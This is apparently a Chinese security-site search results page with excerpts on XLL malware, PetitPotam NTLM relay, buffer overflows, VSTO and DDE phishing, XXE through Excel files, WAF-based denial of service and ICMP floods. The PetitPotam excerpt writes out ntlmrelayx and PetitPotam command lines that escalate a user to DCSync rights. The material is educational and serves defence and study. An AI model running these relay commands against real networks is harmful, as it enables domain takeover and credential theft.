首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

攻击者开始使用 XLL 文件进行攻击

现在,攻击者也滥用这项技术来达成自己的恶意目标。 攻击者将带有恶意 XLL 附件或者恶意链接的电子邮件发送给用户,受害者点击附件打开 Microsoft Excel 后会提示其安装并激活加载项。...XLL 恶意软件出售 因为 XLL 恶意文件的快速增长,我们在地下犯罪论坛上进行了相应的调查,评估使用这种文件格式的恶意工具和服务的流行程度。...要分析该恶意代码,需要将资源保存到硬盘并使用 LZMA 算法进行解压缩。对 .NET 文件进行反编译后,可见 XLL 加载项的启动函数,该加载项为恶意软件 Downloader。...数据在循环中解密,首先确定数据的位置与大小,紧接着进行异或解密。每处理八个字节,密钥就要对用改变。...利用 XLL 文件攻击的数量增长,表明攻击者对这种技术很感兴趣。

1.5K10
您找到你想要的搜索结果了吗?
是的
没有找到

利用PetitPotam进行NTLM Relay攻击

利用PetitPotam进行NTLM Relay攻击 2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。...利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTLM Hash,从而攻击者在拿到Net-NTLM Hash后能进行NTLM Relay攻击,进而接管整个域。...首先使用ntlmrelayx脚本进行监听 python3 ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.211.55.4 -smb2support...选项用于清除MIC标志 --escalate-user用于赋予指定用户dcsync权限 -smb2support 用于支持SMB2协议 -t 将认证凭据中继到指定ldap 然后使用Petitpotam脚本进行攻击...python3 Petitpotam.py -d xie.com -u hack -p P@ss1234 10.211.55.2 10.211.55.5 或者使用exe进行攻击,需要在域内机器上执行该

2.3K20

利用软件的漏洞进行攻击

---- 利用软件的漏洞进行攻击 前言 本篇继续阅读学习《有趣的二进制:软件安全与逆向分析》,本章是利用软件的漏洞进行攻击,简单介绍了缓冲区溢出漏洞的原理和示例,然后给出了一些防御措施,最后介绍了对防御机制的绕过方法...bfbfebe8`" 4、执行任意代码的原理 在函数调用的结构中会用到栈的概念 一个sample: func 函数有三个参数,分别传递了 1、2、3 三个数字 func 函数内部没有进行任何处理...也就是说,如果覆盖了 ret_addr,攻击者就可以让程序跳转到任意地址。...如果攻击者事先准备一段代码,然后让程序跳转到这段代码,也就相当于成功攻击了“可执行任意代码的漏洞” 5、攻击代码示例 一个能够启动 /bin/sh 的sample #include ...1、ASLR 地址空间布局随机化(Address Space Layout Randomization,ASLR):一种对栈、模块、动态分配的内存空间等的地址(位置)进行随机配置的机制,属于操作系统的功能

93610

攻击者使用 VSTO 接替宏进行武器化攻击

几十年来,VBG 宏代码都是攻击者的核心工具。但自从微软开始默认阻止来自互联网的 Office 文件的所有 VBA 宏,这一攻击途径受到了极大的压制。由于攻击面的减少,攻击者必须探索替代的攻击媒介。...近期的许多研究表明,LNK 文件已经受到了攻击者的青睐。此外,VSTO(Visual Studio Tools for Office) 文件也成为了重要的攻击媒介。 什么是 VSTO?...核心代码 经过解码和解压缩后,可以看到该段代码为了从 C&C 服务器拉取另一段 PowerShell 代码: 实际 PowerShell 代码 远程 VSTO 远程的 VSTO 更加难以检测和预防,但攻击者需要考虑各种与信任有关的安全机制也导致了攻击更加复杂...恶意代码 攻击的 POC 为了促进社区的研究,研究人员公开了 POC 代码。...结论 尽管 VSTO 在实际中并不常见,但由于其攻击能力的完整,研究人员认为未来会有更多的攻击者开始采用这种攻击向量,尤其是国家级攻击组织。

87430

利用WAF进行拒绝服务攻击

常见的WAF的防御原理 当黑客进行攻击时,所有的流量会被转移到WAF设备中进行清洗或者拦截,最终只把正常用户的请求转发给服务器。 ?...常规硬件Waf的实现方式是通过代理技术代理来自外部的流量,并对请求包进行解析,通过安全规则库的攻击规则进行匹配,如成功匹配规则库中的规则,则识别为异常并进行请求阻断。...拦截恶意攻击 webshell扫描 IP黑白名单 等等 三、利用WAf进行拒绝服务攻击 危害: 利用WAF进行拒绝服务攻击,当任意用户访问目标页面(有时可以是网站首页),浏览器将自动发送恶意攻击流量...实例:利用WAF拒绝服务DiscuzX 主机安装安全狗web网站apache版,开启IP临时黑白名单功能,对于进行攻击的IP进行5分钟的封禁。 ?...主机中搭建DiscuzX网站,在DiscuzX中存在大量可以进行自定义的图片。 ? 通过在自定义的网络图片中,添加大量的双url编码后的攻击payload,进行攻击

1.9K11

Linux下防御ddos攻击

Linux服务器在运营过程中可能会受到黑客攻击,常见的攻击方式有SYN,DDOS等。通过更换IP,查找被攻击的站点可能避开攻击,但是中断服务的时间比较长。比较彻底的解决方法是添置硬件防火墙。...Linux内核提供了若干SYN相关的配置,加大SYN队列长度可以容纳更多等待连接的网络连接数,打开SYN Cookie功能可以阻止部分 SYN攻击,降低重试次数也有一定效果。...一、通过sysctl和iptables来防范 对sysctl参数进行修改 $ sudo sysctl -a | grep ipv4 | grep syn 1 输出类似下面: net.ipv4.tcp_max_syn_backlog..."Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)"(这个应该就是攻击者使用user_agent) 2、linux抵御DDOS攻击 通过iptables限制...linux抵御DDOS攻击 通过iptables限制TCP连接和频率 : https://www.jb51.net/article/84360.htm 未经允许不得转载:肥猫博客 » Linux下防御ddos

2.1K70

Kali linux 渗透攻击之社会工程学攻击

很多单位都使用社会工程学的方法来进行安全评估,以考核雇员的安全完整性,并通过这种方法调查工作流程和人员方面的安全弱点。需要注意的是,社会工程学是种很常见的技术,可以说各种人员都会使用这种技术。...(3)规划攻击 你可以对目标采取直接了当的攻击方式,也可以利用电子辅助技术被动攻击目标。以这些挖掘出来的情报入口着手,我们恶意轻松的拟定攻击路径和攻击方法。...例如,在获取目标人员的银行信息方面,只要目标人员是哟E-mail,我们就可以进行钓鱼攻击。这种攻击属于近乎完美的攻击方案。...其中,人们最常用的方法有:用恶意附件对目标进行E-mail钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击。...它是实现这些攻击方法的合成攻击平台。充分利用这个程序的极具说服力的技术,可对人的因素进行深入测试。 ? 至于SET的使用要结合具体场景,这里就不演示了,在设置时只需要根据所给的选项与提示完成配置就好。

2.4K20

如何使用OpenAttack进行文本对抗攻击

关于OpenAttack OpenAttack是一款专为文本对抗攻击设计的开源工具套件,该工具基于Python开发,可以处理文本对抗攻击的整个过程,包括预处理文本、访问目标用户模型、生成对抗示例和评估攻击模型等等...功能&使用 OpenAttack支持以下几种功能: 高可用性:OpenAttack提供了易于使用的API,可以支持文本对抗攻击的整个过程; 全面覆盖攻击模型类型:OpenAttack支持句子/单词/字符级扰动和梯度.../分数/基于决策/盲攻击模型; 灵活性强&可扩展:我们可以轻松攻击定制目标用户模型,或开发和评估定制的攻击模型; 综合评估:OpenAttack可以从攻击有效性、对抗示例质量和攻击效率等方面全面评估攻击模型...; OpenAttack的使用范围非常广,其中包括但不限于: 为攻击模型提供各种评估基线; 使用其全面评估指标综合评估攻击模型; 借助通用攻击组件,协助快速开发新的攻击模型; 评估机器学习模型对各种对抗攻击的鲁棒性...; 通过使用生成的对抗示例丰富训练数据,进行对抗训练以提高机器学习模型的鲁棒性; 工具模块 工具安装 我们可以使用pip安装,或者克隆该项目源码来安装OpenAttack。

1.3K20

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

渗透攻击红队 一个专注于红队攻击的公众号 ? 大家好,这里是 渗透攻击红队 的第 54 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新 ?...攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。...DDE 攻击演示 DDE 攻击打开 calc 首先通过 word 文档设置一个域代码:crlt+f9,或者选中“插入”-“文件部件”-“域”,选中第一个 = (Formula) 然后右键切换域代码来编辑代码...结尾 DDE 攻击比较老了,不过在渗透中难免还是会碰到;关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击,而至于怎样才能让目标心甘情愿的点击,那就靠各位如何包装钓鱼邮件

1.1K40

漏洞笔记(二)|利用Excel进行XXE攻击

某次测试中,在某系统后台通过上传Excel文件触发XXE攻击,这种姿势利用成功比较少,故在此将测试过程记录分享出来。...所以不正确的读取2007版本Microsoft office格式文件也存在着XXE攻击的可能性。...xls格式文件没办法插入Payload进行XXE攻击。 由于系统给出的默认模板user.xls没办法利用,那我们尝试自己新建一个xlsx格式文件进行上传,是否可行呢?...在客户端进行监听 eval.dtd文件存放在客户端,内容如下图。作用是通过file协议读取测试目标的/etc/hostname文件,并将读取的结果通过HTTP请求的参数p带出。 ?...总结 利用Excel进行XXE攻击非常简单,使用版本较低的第三方库解析Excel文件时,基本都会引入XXE问题。

5.9K20

滥用jQuery进行CSS驱动的定时攻击

Arthur Saftnes去年做了一些关于使用jQuery CSS选择器进行计时攻击的非常棒的研究,事实上它可能是去年我最喜欢的博客文章。...这是网站将location.hash传递给jQuery $函数的常见设计模式: $(location.hash); 哈希可能是攻击者控制的,这曾经导致XSS,但jQuery修补了许多年前。...我正在寻找hashchange事件的原因是攻击的局限性; 为了衡量您需要重复更改哈希以对所有可能的字符进行二进制搜索所需的性能影响,这只能在hashchange事件触发时进行。...发布的原始技术的另一个限制是,您需要网站对散列进行URL解码,因为大多数现代浏览器现在对其进行URL编码 - 但我找到了解决此问题的方法。...Arthur最初的攻击使用了CSS属性选择器,但是全名不在任何输入元素中,因此我无法使用它们。

1.1K30

Linux编程之ICMP洪水攻击

我的上一篇文章《Linux编程之PING的实现》里使用ICMP协议实现了PING的程序,ICMP除了实现这么一个PING程序,还有哪些不为人知或者好玩的用途?...这里介绍三种ICMP洪水攻击的方式: (1)直接洪水攻击 这样做需要本地主机的带宽和目的主机的带宽之间进行比拼,比如我的主机网络带宽是30M的,而你的主机网络带宽仅为3M,那我发起洪水攻击淹没你的主机成功率就很大了...(3)反射攻击 这类攻击的思想不同于上面两种攻击,反射攻击的设计更为巧妙。...这种攻击非常隐蔽,因为受害主机很难查出攻击源是谁。 ? 二、ICMP洪水攻击程序设计 这里我想实现一个ICMP洪水攻击的例子,这里我想采用方式二来进行设计。...形成DDoS攻击场景 这里的“放大网络”可以理解为具有很多主机的网络,这些主机的操作系统需要支持对目的地址为广播地址的某种ICMP请求数据包进行响应。

2.1K21
领券